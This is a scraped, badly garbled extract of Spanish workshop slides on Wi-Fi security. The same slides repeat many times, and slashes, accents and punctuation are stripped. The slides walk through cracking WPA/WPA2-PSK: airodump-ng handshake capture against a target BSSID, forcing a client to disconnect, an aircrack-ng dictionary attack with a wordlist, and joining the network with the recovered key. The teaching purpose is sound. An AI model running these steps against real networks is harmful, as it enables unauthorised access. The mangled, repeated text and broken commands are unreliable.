WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 76: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 77: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 78: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 79: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 80: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 81: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 82: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

